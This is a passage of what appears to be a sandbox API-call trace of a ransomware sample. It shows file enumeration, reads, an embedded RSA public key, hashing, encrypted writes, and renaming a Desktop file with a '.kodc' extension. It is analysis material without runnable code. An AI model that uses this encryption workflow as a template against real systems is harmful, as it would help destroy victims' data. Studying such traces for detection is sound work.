0x32ceca0 [0097.850] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cecc0 [0097.850] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69be70 [0097.850] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0097.850] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0097.850] GetCurrentThreadId () returned 0x42c [0097.850] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0097.850] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0097.850] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xeb) returned 0x32b14c8 [0097.850] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0097.850] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0097.850] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0097.850] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0097.850] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32b14c8 | out: hHeap=0x630000) returned 1 [0097.851] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69bd68 [0097.851] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ceca0 | out: hHeap=0x630000) returned 1 [0097.851] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4c) returned 0x33183f8 [0097.851] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32ceca0 [0097.851] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69bc60 [0097.851] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec40 [0097.851] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a5b0 [0097.851] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec40 | out: hHeap=0x630000) returned 1 [0097.851] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec40 [0097.851] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec50 [0097.851] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec60 [0097.851] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec80 [0097.851] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec90 [0097.851] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cecb0 [0097.851] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec10 [0097.851] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a748 [0097.851] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec50 | out: hHeap=0x630000) returned 1 [0097.851] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cec50 [0097.851] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec40 | out: hHeap=0x630000) returned 1 [0097.852] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec40 [0097.852] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec70 [0097.852] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32ced00 [0097.852] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cece0 [0097.852] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a760 [0097.852] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ced00 | out: hHeap=0x630000) returned 1 [0097.852] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32adee0 [0097.852] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec70 | out: hHeap=0x630000) returned 1 [0097.852] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a730 [0097.852] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cece0 | out: hHeap=0x630000) returned 1 [0097.852] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a538 [0097.852] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec40 | out: hHeap=0x630000) returned 1 [0097.852] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a568 [0097.852] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec60 | out: hHeap=0x630000) returned 1 [0097.852] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a520 [0097.852] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cecb0 | out: hHeap=0x630000) returned 1 [0097.852] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x331a778 [0097.852] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a520 | out: hHeap=0x630000) returned 1 [0097.852] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x331a520 [0097.852] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a568 | out: hHeap=0x630000) returned 1 [0097.852] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cecb0 [0097.852] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ceca0 | out: hHeap=0x630000) returned 1 [0097.852] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32ad2c0 [0097.852] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cecb0 | out: hHeap=0x630000) returned 1 [0097.852] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18) returned 0x32ad520 [0097.852] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a748 | out: hHeap=0x630000) returned 1 [0097.853] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a748 [0097.853] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec50 | out: hHeap=0x630000) returned 1 [0097.853] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x204) returned 0x9b96968 [0097.853] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a5b0 | out: hHeap=0x630000) returned 1 [0097.853] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x108) returned 0x9b8c658 [0097.853] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a520 | out: hHeap=0x630000) returned 1 [0097.853] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x210) returned 0x32d0958 [0097.853] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ad520 | out: hHeap=0x630000) returned 1 [0097.853] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10c) returned 0x9b8c428 [0097.853] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec80 | out: hHeap=0x630000) returned 1 [0097.853] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x108) returned 0x9b8c540 [0097.853] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a748 | out: hHeap=0x630000) returned 1 [0097.853] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x200) returned 0x32cef08 [0097.853] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c658 | out: hHeap=0x630000) returned 1 [0097.853] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69ba50 [0097.853] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cecc0 | out: hHeap=0x630000) returned 1 [0097.853] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x692d18 | out: hHeap=0x630000) returned 1 [0097.854] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69bd68 | out: hHeap=0x630000) returned 1 [0097.854] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69ba50 | out: hHeap=0x630000) returned 1 [0097.854] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ad2c0 | out: hHeap=0x630000) returned 1 [0097.854] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c540 | out: hHeap=0x630000) returned 1 [0097.854] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d0958 | out: hHeap=0x630000) returned 1 [0097.854] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cef08 | out: hHeap=0x630000) returned 1 [0097.854] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c428 | out: hHeap=0x630000) returned 1 [0097.854] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec90 | out: hHeap=0x630000) returned 1 [0097.854] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a778 | out: hHeap=0x630000) returned 1 [0097.854] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec10 | out: hHeap=0x630000) returned 1 [0097.854] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a538 | out: hHeap=0x630000) returned 1 [0097.854] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32adee0 | out: hHeap=0x630000) returned 1 [0097.854] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a760 | out: hHeap=0x630000) returned 1 [0097.854] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a730 | out: hHeap=0x630000) returned 1 [0097.854] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3298d18 | out: hHeap=0x630000) returned 1 [0097.854] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3316db8 | out: hHeap=0x630000) returned 1 [0097.854] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69be70 | out: hHeap=0x630000) returned 1 [0097.854] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a718 | out: hHeap=0x630000) returned 1 [0097.854] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3340140 | out: hHeap=0x630000) returned 1 [0097.854] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b96968 | out: hHeap=0x630000) returned 1 [0097.855] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69bc60 | out: hHeap=0x630000) returned 1 [0097.855] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33183f8 | out: hHeap=0x630000) returned 1 [0097.855] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c770 | out: hHeap=0x630000) returned 1 [0097.855] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32adf00 | out: hHeap=0x630000) returned 1 [0097.855] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec00 | out: hHeap=0x630000) returned 1 [0097.855] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32aed00 | out: hHeap=0x630000) returned 1 [0097.855] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3338ee8 | out: hHeap=0x630000) returned 1 [0097.855] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d2a78 | out: hHeap=0x630000) returned 1 [0097.855] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3317170 | out: hHeap=0x630000) returned 1 [0097.855] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cc1c0 | out: hHeap=0x630000) returned 1 [0097.855] WriteFile (in: hFile=0x5cc, lpBuffer=0x9ba4d90*, nNumberOfBytesToWrite=0x17943, lpNumberOfBytesWritten=0x9e2fb14, lpOverlapped=0x0 | out: lpBuffer=0x9ba4d90*, lpNumberOfBytesWritten=0x9e2fb14*=0x17943, lpOverlapped=0x0) returned 1 [0097.855] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9ba4d90 | out: hHeap=0x630000) returned 1 [0097.855] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x17948, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0097.855] WriteFile (in: hFile=0x5cc, lpBuffer=0x69b948*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9e2fb50, lpOverlapped=0x0 | out: lpBuffer=0x69b948*, lpNumberOfBytesWritten=0x9e2fb50*=0x100, lpOverlapped=0x0) returned 1 [0097.856] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69b948 | out: hHeap=0x630000) returned 1 [0097.856] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce548 [0097.856] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x428) returned 0x333b018 [0097.856] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", cchWideChar=-1, lpMultiByteStr=0x333b018, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", lpUsedDefaultChar=0x0) returned 41 [0097.856] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x430) returned 0x333a888 [0097.856] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333b018 | out: hHeap=0x630000) returned 1 [0097.856] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce548 | out: hHeap=0x630000) returned 1 [0097.856] WriteFile (in: hFile=0x5cc, lpBuffer=0x333a888*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x9e2fb50, lpOverlapped=0x0 | out: lpBuffer=0x333a888*, lpNumberOfBytesWritten=0x9e2fb50*=0x28, lpOverlapped=0x0) returned 1 [0097.856] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333a888 | out: hHeap=0x630000) returned 1 [0097.856] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0097.856] WriteFile (in: hFile=0x5cc, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x9e2fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x9e2fb50*=0x26, lpOverlapped=0x0) returned 1 [0097.856] CloseHandle (hObject=0x5cc) returned 1 [0097.858] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce548 [0097.858] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x870) returned 0x333bc58 [0097.858] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce548 | out: hHeap=0x630000) returned 1 [0097.858] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\PQdv.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\pqdv.bmp"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\PQdv.bmp.kodc" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\pqdv.bmp.kodc")) returned 1 [0097.859] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333bc58 | out: hHeap=0x630000) returned 1 [0097.859] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33171a8 | out: hHeap=0x630000) returned 1 [0097.859] VirtualFree (lpAddress=0x21b0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0097.860] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33362c8 | out: hHeap=0x630000) returned 1 [0097.860] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xebd89e40, ftCreationTime.dwHighDateTime=0x1d5bb1f, ftLastAccessTime.dwLowDateTime=0x4130c530, ftLastAccessTime.dwHighDateTime=0x1d5c592, ftLastWriteTime.dwLowDateTime=0x4130c530, ftLastWriteTime.dwHighDateTime=0x1d5c592, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="pwaY", cAlternateFileName="")) returned 1 [0097.860] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce548 [0097.860] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce0d0 [0097.860] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce208 [0097.860] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce0d0 | out: hHeap=0x630000) returned 1 [0097.860] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce548 | out: hHeap=0x630000) returned 1 [0097.860] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xee48d880, ftCreationTime.dwHighDateTime=0x1d5bbaf, ftLastAccessTime.dwLowDateTime=0x22748330, ftLastAccessTime.dwHighDateTime=0x1d5beca, ftLastWriteTime.dwLowDateTime=0x22748330, ftLastWriteTime.dwHighDateTime=0x1d5beca, nFileSizeHigh=0x0, nFileSizeLow=0x15029, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Q0Ki1.odt", cAlternateFileName="")) returned 1 [0097.860] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x50) returned 0x33183f8 [0097.860] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x76) returned 0x33362c8 [0097.860] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33183f8 | out: hHeap=0x630000) returned 1 [0097.860] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Q0Ki1.odt") returned=".odt" [0097.860] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Q0Ki1.odt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\q0ki1.odt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5cc [0097.860] GetFileSizeEx (in: hFile=0x5cc, lpFileSize=0x9e2fb40 | out: lpFileSize=0x9e2fb40*=86057) returned 1 [0097.860] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x21b0000 [0097.863] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x15003, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0097.863] ReadFile (in: hFile=0x5cc, lpBuffer=0x21b0000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9e2fb78, lpOverlapped=0x0 | out: lpBuffer=0x21b0000*, lpNumberOfBytesRead=0x9e2fb78*=0x26, lpOverlapped=0x0) returned 1 [0097.864] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x33171a8 [0097.864] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33171a8 | out: hHeap=0x630000) returned 1 [0097.864] SetFilePointer (in: hFile=0x5cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0097.864] ReadFile (in: hFile=0x5cc, lpBuffer=0x21b0000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x9e2fb70, lpOverlapped=0x0 | out: lpBuffer=0x21b0000*, lpNumberOfBytesRead=0x9e2fb70*=0x15029, lpOverlapped=0x0) returned 1 [0097.865] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0097.865] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f1) returned 0x32d2a78 [0097.865] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0097.865] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0097.865] CryptAcquireContextW (in: phProv=0x9e2fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9e2fa50*=0x692d18) returned 1 [0097.866] CryptCreateHash (in: hProv=0x692d18, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9e2fa58 | out: phHash=0x9e2fa58) returned 1 [0097.866] CryptHashData (hHash=0x3331bc8, pbData=0x32d2a78, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0097.866] CryptGetHashParam (in: hHash=0x3331bc8, dwParam=0x2, pbData=0x0, pdwDataLen=0x9e2fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9e2fa54) returned 1 [0097.866] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x11) returned 0x32adf00 [0097.866] CryptGetHashParam (in: hHash=0x3331bc8, dwParam=0x2, pbData=0x32adf00, pdwDataLen=0x9e2fa54, dwFlags=0x0 | out: pbData=0x32adf00, pdwDataLen=0x9e2fa54) returned 1 [0097.866] GetLastError () returned 0x0 [0097.866] CryptDestroyHash (hHash=0x3331bc8) returned 1 [0097.866] CryptReleaseContext (hProv=0x692d18, dwFlags=0x0) returned 1 [0097.866] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d2a78 | out: hHeap=0x630000) returned 1 [0097.866] UuidCreate (in: Uuid=0x9e2fa48 | out: Uuid=0x9e2fa48) returned 0x0 [0097.866] UuidToStringA (in: Uuid=0x9e2fa48, StringUuid=0x9e2fa40 | out: StringUuid=0x9e2fa40) returned 0x0 [0097.866] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x3317170 [0097.866] RpcStringFreeA (in: String=0x9e2fa40 | out: String=0x9e2fa40) returned 0x0 [0097.866] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33171a8 | out: hHeap=0x630000) returned 1 [0097.866] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x33171a8 [0097.866] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x15030) returned 0x9ba4d90 [0097.867] SetFilePointer (in: hFile=0x5cc, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0097.867] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3317170 | out: hHeap=0x630000) returned 1 [0097.867] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f0) returned 0x32cc1c0 [0097.867] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x3317170 [0097.867] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f0) returned 0x32d2a78 [0097.867] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x3338ee8 [0097.868] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x3340140 [0097.868] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a718 [0097.868] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x3340188 [0097.868] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a730 [0097.868] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a760 [0097.868] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a538 [0097.868] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a778 [0097.868] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x24) returned 0x334ce70 [0097.868] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x158) returned 0x9b9f078 [0097.868] RtlReAllocateHeap (Heap=0x630000, Flags=0x0, Ptr=0x9b9f078, Size=0x218) returned 0x32d0958 [0097.868] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x558) returned 0x333a888 [0097.868] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a760 | out: hHeap=0x630000) returned 1 [0097.868] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a778 | out: hHeap=0x630000) returned 1 [0097.868] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a538 | out: hHeap=0x630000) returned 1 [0097.868] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x334ce70 | out: hHeap=0x630000) returned 1 [0097.868] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333a888 | out: hHeap=0x630000) returned 1 [0097.868] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a538 [0097.868] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cec00 [0097.868] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x331a778 [0097.868] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18) returned 0x32aed00 [0097.868] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x9) returned 0x331a760 [0097.868] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cec10 [0097.868] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10e) returned 0x9b8c770 [0097.869] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fc30 [0097.869] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x3338fa8 [0097.869] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32adf00 [0097.869] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x104) returned 0x9b8c428 [0097.869] RtlAllocateHeap (HeapHandle=0x630000, 